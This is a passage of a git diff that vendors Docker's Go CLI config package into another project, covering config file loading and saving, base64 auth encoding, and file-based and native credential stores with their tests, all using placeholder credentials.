up in new form + saveConfigAndValidateNewFormat(t, config, tmpHome) +} + +func TestEmptyFile(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + fn := filepath.Join(tmpHome, ConfigFileName) + if err := ioutil.WriteFile(fn, []byte(""), 0600); err != nil { + t.Fatal(err) + } + + _, err = Load(tmpHome) + 
if err == nil { + t.Fatalf("Was supposed to fail") + } +} + +func TestEmptyJSON(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + fn := filepath.Join(tmpHome, ConfigFileName) + if err := ioutil.WriteFile(fn, []byte("{}"), 0600); err != nil { + t.Fatal(err) + } + + config, err := Load(tmpHome) + if err != nil { + t.Fatalf("Failed loading on empty json file: %q", err) + } + + // Now save it and make sure it shows up in new form + saveConfigAndValidateNewFormat(t, config, tmpHome) +} + +func TestOldInvalidsAuth(t *testing.T) { + invalids := map[string]string{ + `username = test`: "The Auth config file is empty", + `username +password`: "Invalid Auth config file", + `username = test +email`: "Invalid auth configuration file", + } + + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + homeKey := homedir.Key() + homeVal := homedir.Get() + + defer func() { os.Setenv(homeKey, homeVal) }() + os.Setenv(homeKey, tmpHome) + + for content, expectedError := range invalids { + fn := filepath.Join(tmpHome, oldConfigfile) + if err := ioutil.WriteFile(fn, []byte(content), 0600); err != nil { + t.Fatal(err) + } + + config, err := Load(tmpHome) + // Use Contains instead of == since the file name will change each time + if err == nil || !strings.Contains(err.Error(), expectedError) { + t.Fatalf("Should have failed\nConfig: %v\nGot: %v\nExpected: %v", config, err, expectedError) + } + + } +} + +func TestOldValidAuth(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + homeKey := homedir.Key() + homeVal := homedir.Get() + + defer func() { os.Setenv(homeKey, homeVal) }() + os.Setenv(homeKey, tmpHome) + + fn := filepath.Join(tmpHome, oldConfigfile) + js := `username = am9lam9lOmhlbGxv + email = user@example.com` 
+ if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { + t.Fatal(err) + } + + config, err := Load(tmpHome) + if err != nil { + t.Fatal(err) + } + + // defaultIndexserver is https://index.docker.io/v1/ + ac := config.AuthConfigs["https://index.docker.io/v1/"] + if ac.Username != "joejoe" || ac.Password != "hello" { + t.Fatalf("Missing data from parsing:\n%q", config) + } + + // Now save it and make sure it shows up in new form + configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) + + expConfStr := `{ + "auths": { + "https://index.docker.io/v1/": { + "auth": "am9lam9lOmhlbGxv" + } + } +}` + + if configStr != expConfStr { + t.Fatalf("Should have save in new form: \n%s\n not \n%s", configStr, expConfStr) + } +} + +func TestOldJSONInvalid(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + homeKey := homedir.Key() + homeVal := homedir.Get() + + defer func() { os.Setenv(homeKey, homeVal) }() + os.Setenv(homeKey, tmpHome) + + fn := filepath.Join(tmpHome, oldConfigfile) + js := `{"https://index.docker.io/v1/":{"auth":"test","email":"user@example.com"}}` + if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { + t.Fatal(err) + } + + config, err := Load(tmpHome) + // Use Contains instead of == since the file name will change each time + if err == nil || !strings.Contains(err.Error(), "Invalid auth configuration file") { + t.Fatalf("Expected an error got : %v, %v", config, err) + } +} + +func TestOldJSON(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + homeKey := homedir.Key() + homeVal := homedir.Get() + + defer func() { os.Setenv(homeKey, homeVal) }() + os.Setenv(homeKey, tmpHome) + + fn := filepath.Join(tmpHome, oldConfigfile) + js := `{"https://index.docker.io/v1/":{"auth":"am9lam9lOmhlbGxv","email":"user@example.com"}}` + if err := ioutil.WriteFile(fn, []byte(js), 
0600); err != nil { + t.Fatal(err) + } + + config, err := Load(tmpHome) + if err != nil { + t.Fatalf("Failed loading on empty json file: %q", err) + } + + ac := config.AuthConfigs["https://index.docker.io/v1/"] + if ac.Username != "joejoe" || ac.Password != "hello" { + t.Fatalf("Missing data from parsing:\n%q", config) + } + + // Now save it and make sure it shows up in new form + configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) + + expConfStr := `{ + "auths": { + "https://index.docker.io/v1/": { + "auth": "am9lam9lOmhlbGxv", + "email": "user@example.com" + } + } +}` + + if configStr != expConfStr { + t.Fatalf("Should have save in new form: \n'%s'\n not \n'%s'\n", configStr, expConfStr) + } +} + +func TestNewJSON(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + fn := filepath.Join(tmpHome, ConfigFileName) + js := ` { "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv" } } }` + if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { + t.Fatal(err) + } + + config, err := Load(tmpHome) + if err != nil { + t.Fatalf("Failed loading on empty json file: %q", err) + } + + ac := config.AuthConfigs["https://index.docker.io/v1/"] + if ac.Username != "joejoe" || ac.Password != "hello" { + t.Fatalf("Missing data from parsing:\n%q", config) + } + + // Now save it and make sure it shows up in new form + configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) + + expConfStr := `{ + "auths": { + "https://index.docker.io/v1/": { + "auth": "am9lam9lOmhlbGxv" + } + } +}` + + if configStr != expConfStr { + t.Fatalf("Should have save in new form: \n%s\n not \n%s", configStr, expConfStr) + } +} + +func TestNewJSONNoEmail(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + fn := filepath.Join(tmpHome, ConfigFileName) + js := ` { "auths": { 
"https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv" } } }` + if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { + t.Fatal(err) + } + + config, err := Load(tmpHome) + if err != nil { + t.Fatalf("Failed loading on empty json file: %q", err) + } + + ac := config.AuthConfigs["https://index.docker.io/v1/"] + if ac.Username != "joejoe" || ac.Password != "hello" { + t.Fatalf("Missing data from parsing:\n%q", config) + } + + // Now save it and make sure it shows up in new form + configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) + + expConfStr := `{ + "auths": { + "https://index.docker.io/v1/": { + "auth": "am9lam9lOmhlbGxv" + } + } +}` + + if configStr != expConfStr { + t.Fatalf("Should have save in new form: \n%s\n not \n%s", configStr, expConfStr) + } +} + +func TestJSONWithPsFormat(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + fn := filepath.Join(tmpHome, ConfigFileName) + js := `{ + "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } }, + "psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}" +}` + if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { + t.Fatal(err) + } + + config, err := Load(tmpHome) + if err != nil { + t.Fatalf("Failed loading on empty json file: %q", err) + } + + if config.PsFormat != `table {{.ID}}\t{{.Label "com.docker.label.cpu"}}` { + t.Fatalf("Unknown ps format: %s\n", config.PsFormat) + } + + // Now save it and make sure it shows up in new form + configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) + if !strings.Contains(configStr, `"psFormat":`) || + !strings.Contains(configStr, "{{.ID}}") { + t.Fatalf("Should have save in new form: %s", configStr) + } +} + +func TestJSONWithCredentialStore(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + fn := 
filepath.Join(tmpHome, ConfigFileName) + js := `{ + "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } }, + "credsStore": "crazy-secure-storage" +}` + if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { + t.Fatal(err) + } + + config, err := Load(tmpHome) + if err != nil { + t.Fatalf("Failed loading on empty json file: %q", err) + } + + if config.CredentialsStore != "crazy-secure-storage" { + t.Fatalf("Unknown credential store: %s\n", config.CredentialsStore) + } + + // Now save it and make sure it shows up in new form + configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) + if !strings.Contains(configStr, `"credsStore":`) || + !strings.Contains(configStr, "crazy-secure-storage") { + t.Fatalf("Should have save in new form: %s", configStr) + } +} + +func TestJSONWithCredentialHelpers(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + fn := filepath.Join(tmpHome, ConfigFileName) + js := `{ + "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } }, + "credHelpers": { "images.io": "images-io", "containers.com": "crazy-secure-storage" } +}` + if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { + t.Fatal(err) + } + + config, err := Load(tmpHome) + if err != nil { + t.Fatalf("Failed loading on empty json file: %q", err) + } + + if config.CredentialHelpers == nil { + t.Fatal("config.CredentialHelpers was nil") + } else if config.CredentialHelpers["images.io"] != "images-io" || + config.CredentialHelpers["containers.com"] != "crazy-secure-storage" { + t.Fatalf("Credential helpers not deserialized properly: %v\n", config.CredentialHelpers) + } + + // Now save it and make sure it shows up in new form + configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) + if !strings.Contains(configStr, `"credHelpers":`) || + !strings.Contains(configStr, 
"images.io") || + !strings.Contains(configStr, "images-io") || + !strings.Contains(configStr, "containers.com") || + !strings.Contains(configStr, "crazy-secure-storage") { + t.Fatalf("Should have save in new form: %s", configStr) + } +} + +// Save it and make sure it shows up in new form +func saveConfigAndValidateNewFormat(t *testing.T, config *configfile.ConfigFile, homeFolder string) string { + if err := config.Save(); err != nil { + t.Fatalf("Failed to save: %q", err) + } + + buf, err := ioutil.ReadFile(filepath.Join(homeFolder, ConfigFileName)) + if err != nil { + t.Fatal(err) + } + if !strings.Contains(string(buf), `"auths":`) { + t.Fatalf("Should have save in new form: %s", string(buf)) + } + return string(buf) +} + +func TestConfigDir(t *testing.T) { + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpHome) + + if ConfigDir() == tmpHome { + t.Fatalf("Expected ConfigDir to be different than %s by default, but was the same", tmpHome) + } + + // Update configDir + SetConfigDir(tmpHome) + + if ConfigDir() != tmpHome { + t.Fatalf("Expected ConfigDir to %s, but was %s", tmpHome, ConfigDir()) + } +} + +func TestConfigFile(t *testing.T) { + configFilename := "configFilename" + configFile := NewConfigFile(configFilename) + + if configFile.Filename != configFilename { + t.Fatalf("Expected %s, got %s", configFilename, configFile.Filename) + } +} + +func TestJSONReaderNoFile(t *testing.T) { + js := ` { "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } } }` + + config, err := LoadFromReader(strings.NewReader(js)) + if err != nil { + t.Fatalf("Failed loading on empty json file: %q", err) + } + + ac := config.AuthConfigs["https://index.docker.io/v1/"] + if ac.Username != "joejoe" || ac.Password != "hello" { + t.Fatalf("Missing data from parsing:\n%q", config) + } + +} + +func TestOldJSONReaderNoFile(t *testing.T) { + js := 
`{"https://index.docker.io/v1/":{"auth":"am9lam9lOmhlbGxv","email":"user@example.com"}}` + + config, err := LegacyLoadFromReader(strings.NewReader(js)) + if err != nil { + t.Fatalf("Failed loading on empty json file: %q", err) + } + + ac := config.AuthConfigs["https://index.docker.io/v1/"] + if ac.Username != "joejoe" || ac.Password != "hello" { + t.Fatalf("Missing data from parsing:\n%q", config) + } +} + +func TestJSONWithPsFormatNoFile(t *testing.T) { + js := `{ + "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } }, + "psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}" +}` + config, err := LoadFromReader(strings.NewReader(js)) + if err != nil { + t.Fatalf("Failed loading on empty json file: %q", err) + } + + if config.PsFormat != `table {{.ID}}\t{{.Label "com.docker.label.cpu"}}` { + t.Fatalf("Unknown ps format: %s\n", config.PsFormat) + } + +} + +func TestJSONSaveWithNoFile(t *testing.T) { + js := `{ + "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv" } }, + "psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}" +}` + config, err := LoadFromReader(strings.NewReader(js)) + err = config.Save() + if err == nil { + t.Fatalf("Expected error. 
File should not have been able to save with no file name.") + } + + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatalf("Failed to create a temp dir: %q", err) + } + defer os.RemoveAll(tmpHome) + + fn := filepath.Join(tmpHome, ConfigFileName) + f, _ := os.OpenFile(fn, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600) + defer f.Close() + + err = config.SaveToWriter(f) + if err != nil { + t.Fatalf("Failed saving to file: %q", err) + } + buf, err := ioutil.ReadFile(filepath.Join(tmpHome, ConfigFileName)) + if err != nil { + t.Fatal(err) + } + expConfStr := `{ + "auths": { + "https://index.docker.io/v1/": { + "auth": "am9lam9lOmhlbGxv" + } + }, + "psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}" +}` + if string(buf) != expConfStr { + t.Fatalf("Should have save in new form: \n%s\nnot \n%s", string(buf), expConfStr) + } +} + +func TestLegacyJSONSaveWithNoFile(t *testing.T) { + + js := `{"https://index.docker.io/v1/":{"auth":"am9lam9lOmhlbGxv","email":"user@example.com"}}` + config, err := LegacyLoadFromReader(strings.NewReader(js)) + err = config.Save() + if err == nil { + t.Fatalf("Expected error. 
File should not have been able to save with no file name.") + } + + tmpHome, err := ioutil.TempDir("", "config-test") + if err != nil { + t.Fatalf("Failed to create a temp dir: %q", err) + } + defer os.RemoveAll(tmpHome) + + fn := filepath.Join(tmpHome, ConfigFileName) + f, _ := os.OpenFile(fn, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600) + defer f.Close() + + if err = config.SaveToWriter(f); err != nil { + t.Fatalf("Failed saving to file: %q", err) + } + buf, err := ioutil.ReadFile(filepath.Join(tmpHome, ConfigFileName)) + if err != nil { + t.Fatal(err) + } + + expConfStr := `{ + "auths": { + "https://index.docker.io/v1/": { + "auth": "am9lam9lOmhlbGxv", + "email": "user@example.com" + } + } +}` + + if string(buf) != expConfStr { + t.Fatalf("Should have save in new form: \n%s\n not \n%s", string(buf), expConfStr) + } +} diff --git a/vendor/github.com/docker/docker/cliconfig/configfile/file.go b/vendor/github.com/docker/docker/cliconfig/configfile/file.go new file mode 100644 index 0000000000..39097133a4 --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/configfile/file.go @@ -0,0 +1,183 @@ +package configfile + +import ( + "encoding/base64" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "strings" + + "github.com/docker/docker/api/types" +) + +const ( + // This constant is only used for really old config files when the + // URL wasn't saved as part of the config file and it was just + // assumed to be this value. 
+ defaultIndexserver = "https://index.docker.io/v1/" +) + +// ConfigFile ~/.docker/config.json file info +type ConfigFile struct { + AuthConfigs map[string]types.AuthConfig `json:"auths"` + HTTPHeaders map[string]string `json:"HttpHeaders,omitempty"` + PsFormat string `json:"psFormat,omitempty"` + ImagesFormat string `json:"imagesFormat,omitempty"` + NetworksFormat string `json:"networksFormat,omitempty"` + VolumesFormat string `json:"volumesFormat,omitempty"` + StatsFormat string `json:"statsFormat,omitempty"` + DetachKeys string `json:"detachKeys,omitempty"` + CredentialsStore string `json:"credsStore,omitempty"` + CredentialHelpers map[string]string `json:"credHelpers,omitempty"` + Filename string `json:"-"` // Note: for internal use only + ServiceInspectFormat string `json:"serviceInspectFormat,omitempty"` +} + +// LegacyLoadFromReader reads the non-nested configuration data given and sets up the +// auth config information with given directory and populates the receiver object +func (configFile *ConfigFile) LegacyLoadFromReader(configData io.Reader) error { + b, err := ioutil.ReadAll(configData) + if err != nil { + return err + } + + if err := json.Unmarshal(b, &configFile.AuthConfigs); err != nil { + arr := strings.Split(string(b), "\n") + if len(arr) < 2 { + return fmt.Errorf("The Auth config file is empty") + } + authConfig := types.AuthConfig{} + origAuth := strings.Split(arr[0], " = ") + if len(origAuth) != 2 { + return fmt.Errorf("Invalid Auth config file") + } + authConfig.Username, authConfig.Password, err = decodeAuth(origAuth[1]) + if err != nil { + return err + } + authConfig.ServerAddress = defaultIndexserver + configFile.AuthConfigs[defaultIndexserver] = authConfig + } else { + for k, authConfig := range configFile.AuthConfigs { + authConfig.Username, authConfig.Password, err = decodeAuth(authConfig.Auth) + if err != nil { + return err + } + authConfig.Auth = "" + authConfig.ServerAddress = k + configFile.AuthConfigs[k] = authConfig + } + } + 
return nil +} + +// LoadFromReader reads the configuration data given and sets up the auth config +// information with given directory and populates the receiver object +func (configFile *ConfigFile) LoadFromReader(configData io.Reader) error { + if err := json.NewDecoder(configData).Decode(&configFile); err != nil { + return err + } + var err error + for addr, ac := range configFile.AuthConfigs { + ac.Username, ac.Password, err = decodeAuth(ac.Auth) + if err != nil { + return err + } + ac.Auth = "" + ac.ServerAddress = addr + configFile.AuthConfigs[addr] = ac + } + return nil +} + +// ContainsAuth returns whether there is authentication configured +// in this file or not. +func (configFile *ConfigFile) ContainsAuth() bool { + return configFile.CredentialsStore != "" || + len(configFile.CredentialHelpers) > 0 || + len(configFile.AuthConfigs) > 0 +} + +// SaveToWriter encodes and writes out all the authorization information to +// the given writer +func (configFile *ConfigFile) SaveToWriter(writer io.Writer) error { + // Encode sensitive data into a new/temp struct + tmpAuthConfigs := make(map[string]types.AuthConfig, len(configFile.AuthConfigs)) + for k, authConfig := range configFile.AuthConfigs { + authCopy := authConfig + // encode and save the authstring, while blanking out the original fields + authCopy.Auth = encodeAuth(&authCopy) + authCopy.Username = "" + authCopy.Password = "" + authCopy.ServerAddress = "" + tmpAuthConfigs[k] = authCopy + } + + saveAuthConfigs := configFile.AuthConfigs + configFile.AuthConfigs = tmpAuthConfigs + defer func() { configFile.AuthConfigs = saveAuthConfigs }() + + data, err := json.MarshalIndent(configFile, "", "\t") + if err != nil { + return err + } + _, err = writer.Write(data) + return err +} + +// Save encodes and writes out all the authorization information +func (configFile *ConfigFile) Save() error { + if configFile.Filename == "" { + return fmt.Errorf("Can't save config with empty filename") + } + + if err := 
os.MkdirAll(filepath.Dir(configFile.Filename), 0700); err != nil { + return err + } + f, err := os.OpenFile(configFile.Filename, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600) + if err != nil { + return err + } + defer f.Close() + return configFile.SaveToWriter(f) +} + +// encodeAuth creates a base64 encoded string to containing authorization information +func encodeAuth(authConfig *types.AuthConfig) string { + if authConfig.Username == "" && authConfig.Password == "" { + return "" + } + + authStr := authConfig.Username + ":" + authConfig.Password + msg := []byte(authStr) + encoded := make([]byte, base64.StdEncoding.EncodedLen(len(msg))) + base64.StdEncoding.Encode(encoded, msg) + return string(encoded) +} + +// decodeAuth decodes a base64 encoded string and returns username and password +func decodeAuth(authStr string) (string, string, error) { + if authStr == "" { + return "", "", nil + } + + decLen := base64.StdEncoding.DecodedLen(len(authStr)) + decoded := make([]byte, decLen) + authByte := []byte(authStr) + n, err := base64.StdEncoding.Decode(decoded, authByte) + if err != nil { + return "", "", err + } + if n > decLen { + return "", "", fmt.Errorf("Something went wrong decoding auth config") + } + arr := strings.SplitN(string(decoded), ":", 2) + if len(arr) != 2 { + return "", "", fmt.Errorf("Invalid auth configuration file") + } + password := strings.Trim(arr[1], "\x00") + return arr[0], password, nil +} diff --git a/vendor/github.com/docker/docker/cliconfig/configfile/file_test.go b/vendor/github.com/docker/docker/cliconfig/configfile/file_test.go new file mode 100644 index 0000000000..435797f681 --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/configfile/file_test.go @@ -0,0 +1,27 @@ +package configfile + +import ( + "testing" + + "github.com/docker/docker/api/types" +) + +func TestEncodeAuth(t *testing.T) { + newAuthConfig := &types.AuthConfig{Username: "ken", Password: "test"} + authStr := encodeAuth(newAuthConfig) + decAuthConfig := 
&types.AuthConfig{} + var err error + decAuthConfig.Username, decAuthConfig.Password, err = decodeAuth(authStr) + if err != nil { + t.Fatal(err) + } + if newAuthConfig.Username != decAuthConfig.Username { + t.Fatal("Encode Username doesn't match decoded Username") + } + if newAuthConfig.Password != decAuthConfig.Password { + t.Fatal("Encode Password doesn't match decoded Password") + } + if authStr != "a2VuOnRlc3Q=" { + t.Fatal("AuthString encoding isn't correct.") + } +} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/credentials.go b/vendor/github.com/docker/docker/cliconfig/credentials/credentials.go new file mode 100644 index 0000000000..ca874cac51 --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/credentials/credentials.go @@ -0,0 +1,17 @@ +package credentials + +import ( + "github.com/docker/docker/api/types" +) + +// Store is the interface that any credentials store must implement. +type Store interface { + // Erase removes credentials from the store for a given server. + Erase(serverAddress string) error + // Get retrieves credentials from the store for a given server. + Get(serverAddress string) (types.AuthConfig, error) + // GetAll retrieves all the credentials from the store. + GetAll() (map[string]types.AuthConfig, error) + // Store saves credentials in the store. + Store(authConfig types.AuthConfig) error +} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store.go new file mode 100644 index 0000000000..b4733709b1 --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/credentials/default_store.go @@ -0,0 +1,22 @@ +package credentials + +import ( + "os/exec" + + "github.com/docker/docker/cliconfig/configfile" +) + +// DetectDefaultStore sets the default credentials store +// if the host includes the default store helper program. 
+func DetectDefaultStore(c *configfile.ConfigFile) { + if c.CredentialsStore != "" { + // user defined + return + } + + if defaultCredentialsStore != "" { + if _, err := exec.LookPath(remoteCredentialsPrefix + defaultCredentialsStore); err == nil { + c.CredentialsStore = defaultCredentialsStore + } + } +} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go new file mode 100644 index 0000000000..63e8ed4010 --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go @@ -0,0 +1,3 @@ +package credentials + +const defaultCredentialsStore = "osxkeychain" diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go new file mode 100644 index 0000000000..864c540f6c --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go @@ -0,0 +1,3 @@ +package credentials + +const defaultCredentialsStore = "secretservice" diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go new file mode 100644 index 0000000000..519ef53dcd --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go @@ -0,0 +1,5 @@ +// +build !windows,!darwin,!linux + +package credentials + +const defaultCredentialsStore = "" diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go new file mode 100644 index 0000000000..fb6a9745cf --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go @@ -0,0 +1,3 @@ +package credentials + +const defaultCredentialsStore = "wincred" diff --git 
a/vendor/github.com/docker/docker/cliconfig/credentials/file_store.go b/vendor/github.com/docker/docker/cliconfig/credentials/file_store.go new file mode 100644 index 0000000000..ca73a384d4 --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/credentials/file_store.go @@ -0,0 +1,53 @@ +package credentials + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/cliconfig/configfile" + "github.com/docker/docker/registry" +) + +// fileStore implements a credentials store using +// the docker configuration file to keep the credentials in plain text. +type fileStore struct { + file *configfile.ConfigFile +} + +// NewFileStore creates a new file credentials store. +func NewFileStore(file *configfile.ConfigFile) Store { + return &fileStore{ + file: file, + } +} + +// Erase removes the given credentials from the file store. +func (c *fileStore) Erase(serverAddress string) error { + delete(c.file.AuthConfigs, serverAddress) + return c.file.Save() +} + +// Get retrieves credentials for a specific server from the file store. +func (c *fileStore) Get(serverAddress string) (types.AuthConfig, error) { + authConfig, ok := c.file.AuthConfigs[serverAddress] + if !ok { + // Maybe they have a legacy config file, we will iterate the keys converting + // them to the new format and testing + for r, ac := range c.file.AuthConfigs { + if serverAddress == registry.ConvertToHostname(r) { + return ac, nil + } + } + + authConfig = types.AuthConfig{} + } + return authConfig, nil +} + +func (c *fileStore) GetAll() (map[string]types.AuthConfig, error) { + return c.file.AuthConfigs, nil +} + +// Store saves the given credentials in the file store. 
+func (c *fileStore) Store(authConfig types.AuthConfig) error { + c.file.AuthConfigs[authConfig.ServerAddress] = authConfig + return c.file.Save() +} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go b/vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go new file mode 100644 index 0000000000..efed4e9040 --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go @@ -0,0 +1,139 @@ +package credentials + +import ( + "io/ioutil" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cliconfig" + "github.com/docker/docker/cliconfig/configfile" +) + +func newConfigFile(auths map[string]types.AuthConfig) *configfile.ConfigFile { + tmp, _ := ioutil.TempFile("", "docker-test") + name := tmp.Name() + tmp.Close() + + c := cliconfig.NewConfigFile(name) + c.AuthConfigs = auths + return c +} + +func TestFileStoreAddCredentials(t *testing.T) { + f := newConfigFile(make(map[string]types.AuthConfig)) + + s := NewFileStore(f) + err := s.Store(types.AuthConfig{ + Auth: "super_secret_token", + Email: "foo@example.com", + ServerAddress: "https://example.com", + }) + + if err != nil { + t.Fatal(err) + } + + if len(f.AuthConfigs) != 1 { + t.Fatalf("expected 1 auth config, got %d", len(f.AuthConfigs)) + } + + a, ok := f.AuthConfigs["https://example.com"] + if !ok { + t.Fatalf("expected auth for https://example.com, got %v", f.AuthConfigs) + } + if a.Auth != "super_secret_token" { + t.Fatalf("expected auth `super_secret_token`, got %s", a.Auth) + } + if a.Email != "foo@example.com" { + t.Fatalf("expected email `foo@example.com`, got %s", a.Email) + } +} + +func TestFileStoreGet(t *testing.T) { + f := newConfigFile(map[string]types.AuthConfig{ + "https://example.com": { + Auth: "super_secret_token", + Email: "foo@example.com", + ServerAddress: "https://example.com", + }, + }) + + s := NewFileStore(f) + a, err := s.Get("https://example.com") + if err != nil { + t.Fatal(err) + } 
+ if a.Auth != "super_secret_token" { + t.Fatalf("expected auth `super_secret_token`, got %s", a.Auth) + } + if a.Email != "foo@example.com" { + t.Fatalf("expected email `foo@example.com`, got %s", a.Email) + } +} + +func TestFileStoreGetAll(t *testing.T) { + s1 := "https://example.com" + s2 := "https://example2.com" + f := newConfigFile(map[string]types.AuthConfig{ + s1: { + Auth: "super_secret_token", + Email: "foo@example.com", + ServerAddress: "https://example.com", + }, + s2: { + Auth: "super_secret_token2", + Email: "foo@example2.com", + ServerAddress: "https://example2.com", + }, + }) + + s := NewFileStore(f) + as, err := s.GetAll() + if err != nil { + t.Fatal(err) + } + if len(as) != 2 { + t.Fatalf("wanted 2, got %d", len(as)) + } + if as[s1].Auth != "super_secret_token" { + t.Fatalf("expected auth `super_secret_token`, got %s", as[s1].Auth) + } + if as[s1].Email != "foo@example.com" { + t.Fatalf("expected email `foo@example.com`, got %s", as[s1].Email) + } + if as[s2].Auth != "super_secret_token2" { + t.Fatalf("expected auth `super_secret_token2`, got %s", as[s2].Auth) + } + if as[s2].Email != "foo@example2.com" { + t.Fatalf("expected email `foo@example2.com`, got %s", as[s2].Email) + } +} + +func TestFileStoreErase(t *testing.T) { + f := newConfigFile(map[string]types.AuthConfig{ + "https://example.com": { + Auth: "super_secret_token", + Email: "foo@example.com", + ServerAddress: "https://example.com", + }, + }) + + s := NewFileStore(f) + err := s.Erase("https://example.com") + if err != nil { + t.Fatal(err) + } + + // file store never returns errors, check that the auth config is empty + a, err := s.Get("https://example.com") + if err != nil { + t.Fatal(err) + } + + if a.Auth != "" { + t.Fatalf("expected empty auth token, got %s", a.Auth) + } + if a.Email != "" { + t.Fatalf("expected empty email, got %s", a.Email) + } +} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/native_store.go 
b/vendor/github.com/docker/docker/cliconfig/credentials/native_store.go new file mode 100644 index 0000000000..dec2dbcb82 --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/credentials/native_store.go @@ -0,0 +1,144 @@ +package credentials + +import ( + "github.com/docker/docker-credential-helpers/client" + "github.com/docker/docker-credential-helpers/credentials" + "github.com/docker/docker/api/types" + "github.com/docker/docker/cliconfig/configfile" +) + +const ( + remoteCredentialsPrefix = "docker-credential-" + tokenUsername = "" +) + +// nativeStore implements a credentials store +// using native keychain to keep credentials secure. +// It piggybacks into a file store to keep users' emails. +type nativeStore struct { + programFunc client.ProgramFunc + fileStore Store +} + +// NewNativeStore creates a new native store that +// uses a remote helper program to manage credentials. +func NewNativeStore(file *configfile.ConfigFile, helperSuffix string) Store { + name := remoteCredentialsPrefix + helperSuffix + return &nativeStore{ + programFunc: client.NewShellProgramFunc(name), + fileStore: 